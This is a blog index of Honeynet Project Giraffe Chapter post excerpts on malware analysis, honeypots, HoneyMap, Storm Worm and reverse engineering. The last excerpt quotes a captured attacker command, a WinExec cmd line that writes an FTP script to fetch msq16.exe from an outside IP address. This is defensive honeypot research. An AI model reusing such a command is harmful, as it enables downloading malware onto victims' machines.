<p><strong>Giraffe Chapter</strong><br />
http://www.honeynet.org/not_used/48</p>
<p>We are a development-oriented Honeynet chapter. Our main research interests are: low-interaction honeypots, emulation, and reverse engineering.</p>
<p><strong>Is Android malware served in theatres more sophisticated?</strong><br />
http://www.honeynet.org/node/1081</p>
<p><a href="/node/1080">Pietro wrote a nice post</a> about him finding Android malware while visiting the theatre. Thanks to Thug (thank you Angelo) and HoneyProxy, he was able to get some interesting details about their infrastructure. I was curious what kind of malware you find in a theatre, so I quickly looked at one of the samples that he mentioned: <a href="https://www.virustotal.com/it/file/4c7c0bd7ed69614cb58908d6a28d2aa5eeaac2ad6d03cbcad1a9d01f28a14ab9/analysis/">f6ad9ced69913916038f5bb94433848d</a>.</p>
<p><a href="http://www.honeynet.org/node/1081" target="_blank">read more</a></p>
<p>Tags: android, APK, decompilation, malware, reverse engineering, sandbox evasion, thug. Posted by felix.leder (Giraffe Chapter), Thu, 09 Jan 2014 22:44:49 +0000.</p>
<p><strong>HoneyMap - Visualizing Worldwide Attacks in Real-Time</strong><br />
http://www.honeynet.org/node/960</p>
<p><a href="/node/960"><img src="https://31.24.128.5/sites/default/files/files/images/honeymap.preview.png" width="640" height="358" alt="HoneyMap Screenshot" title="HoneyMap Screenshot" /></a></p>
<p>The HoneyMap shows a real-time visualization of attacks against the Honeynet Project's sensors deployed around the world. It leverages the internal data sharing protocol <a href="https://github.com/rep/hpfeeds">hpfeeds</a> as its data source. Read this post to learn about the technical details and frequently asked questions. Before going into explanations, take a look at the map itself: <a href="http://map.honeynet.org/">map.honeynet.org</a>!</p>
<p><a href="http://www.honeynet.org/node/960" target="_blank">read more</a></p>
<p>Tags: honeymap, honeypot, visualization, worldmap. Posted by mark.schloesser (Giraffe Chapter), Mon, 01 Oct 2012 14:51:45 +0000.</p>
<p><strong>Giraffe Chapter - Status Report 2009/2010</strong><br />
http://www.honeynet.org/node/707</p>
<p>The Giraffe Chapter's continuous goal is to develop and improve honeypot technology and related tools and to conduct in-depth analysis of new attack techniques and malware specimens. This report lists our main activities and contributions from the last two and a half years.</p>
<p><strong>ORGANIZATION</strong></p>
<p>Much to our regret, two of the founding members of our chapter have decided to terminate their Honeynet Project membership and are thus officially moved to alumni status. We respect this step and are grateful for an adventurous journey and their numerous contributions over the years. We will continue to work closely together with our friends, and want them to know that they can rejoin the team whenever they wish to.</p>
<p>The Giraffe Chapter consists of the following people:</p>
<ul>
<li><em>Felix Leder</em></li>
<li><em>Mark Schlösser</em></li>
<li><em>Tillmann Werner</em></li>
<li><em>Georg Wicherski</em></li>
</ul>
<p><a href="http://www.honeynet.org/node/707" target="_blank">read more</a></p>
<p>Posted by tillmann.werner (Giraffe Chapter), Fri, 01 Jul 2011 12:40:23 +0000.</p>
<p><strong>A Breeze of Storm</strong><br />
http://www.honeynet.org/node/539</p>
<p>Today, Steven Adair from Shadowserver informed us about a new piece of malware that looks like a new version of the infamous Storm Worm. Storm was one of the first serious peer-to-peer botnets; it sent out spam for more than two years until its decline in late 2008. Mark Schloesser, Tillmann Werner, Georg Wicherski, and I <a>did some work on how to take down Storm</a> back then, so the rumors about a new version caught our interest.</p>
<p><a href="http://www.honeynet.org/node/539" target="_blank">read more</a></p>
<p>Tags: Storm Worm, Stormfucker. Posted by felix.leder (Giraffe Chapter), Wed, 28 Apr 2010 00:05:23 +0000.</p>
<p><strong>Dissecting the SotM Attack Trace Pcap</strong><br />
http://www.honeynet.org/node/521</p>
<p>Hi everybody,</p>
<p>our first <a href="https://honeynet.org/node/504">Scan of the Month Challenge</a> in 2010 is over! We received 91 submissions in total, and some parts of the solutions are so interesting that I would like to publicly highlight them in this post. Now that the winners are announced (Congratulations Ivan, Franck, and Tareq!), I think I also owe you an explanation why we asked the specific questions and what we expected as answers. I am sure you will be surprised how many pieces of information you can dig up in a plain pcap - I was indeed when I had a look at the solutions we received. Enjoy!</p>
<p><a href="http://www.honeynet.org/node/521" target="_blank">read more</a></p>
<p>Tags: Forensic Challenge 2010. Posted by tillmann.werner (Giraffe Chapter), Fri, 19 Feb 2010 14:13:35 +0000.</p>
<p><strong>RE-Google in action - screenshot</strong><br />
http://www.honeynet.org/node/496</p>
<p><a href="/node/496"><img src="http://www.honeynet.org/sites/default/files/files/images/screenshot.thumbnail.png" alt="RE-Google in action - screenshot" title="RE-Google in action - screenshot" class="image image-thumbnail " width="100" height="81" /></a></p>
<p>Posted by felix.leder (Giraffe Chapter), Sun, 15 Nov 2009 22:49:33 +0000.</p>
<p><strong>RE-Google - or how Grandma started Reverse Engineering</strong><br />
http://www.honeynet.org/node/493</p>
<p>Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the <a href="http://regoogle.carnivore.it">RE-Google</a> plugin for IDA Pro, even your granny can start reversing :)</p>
<p><a href="http://www.honeynet.org/node/493" target="_blank">read more</a></p>
<p>Tags: beginner, google, re-google, reverse engineering, reversing. Posted by felix.leder (Giraffe Chapter), Sun, 15 Nov 2009 22:20:07 +0000.</p>
<p><strong>Iteolih: RPC vulnerability implementation party</strong><br />
http://www.honeynet.org/node/488</p>
<p>The <a title="dionaea homepage" href="http://dionaea.carnivore.it/">Dionaea</a> honeypot got more and more mature during the last weeks. As Markus blogged in <a title="Markus&#039; blog" href="https://www.honeynet.org/node/485">Iteolih: Miles and More</a> the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.</p>
<p>The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)</p>
<p><a href="http://www.honeynet.org/node/488" target="_blank">read more</a></p>
<p>Tags: Iteolih, Samba, DCERPC, Python, libemu. Category: GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots. Posted by mark.schloesser (Giraffe Chapter), Tue, 25 Aug 2009 16:33:00 +0000.</p>
<p><strong>Iteolih: Miles and More</strong><br />
http://www.honeynet.org/node/485</p>
<p>We got a new milestone due:<br />
<strong>10.08.2009</strong></p>
<ul>
<li>thread-pool works</li>
<li>stream recording works</li>
<li>shellcode detection using libemu works</li>
<li>shellcode emulation using libemu works</li>
<li>compiles on Linux &amp; OpenBSD</li>
</ul>
<p>An exploit taken from a public repository and run against the software is detected and emulated.<br />
In short, all required milestone points are met by the current SVN revision.<br />
So, given the time we just saved, here are some words about how it works.</p>
<p><a href="http://www.honeynet.org/node/485" target="_blank">read more</a></p>
<p>Tags: Iteolih. Category: GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots. Posted by markus.koetter (Giraffe Chapter), Tue, 11 Aug 2009 12:10:33 +0000.</p>
<p><strong>Iteolih: malicious ftp services</strong><br />
http://www.honeynet.org/node/470</p>
<p>Yesterday, I got an incomplete, but successful, attack on my honeypot; the attacker's remote code execution looked like this:</p>
<p><strong>WinExec("cmd /c echo open 78.1.96.200 4871 &gt; o&amp;echo user 1 1 &gt;&gt; o &amp;echo get msq16.exe &gt;&gt; o")<br />
ExitThread(0)</strong></p>
<p>As the part required to download the malware to the remote host was incomplete, I got curious and wanted a copy.</p>
<p><a href="http://www.honeynet.org/node/470" target="_blank">read more</a></p>
<p>Tags: Iteolih. Category: GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots. Posted by markus.koetter (Giraffe Chapter), Sun, 26 Jul 2009 13:28:13 +0000.</p>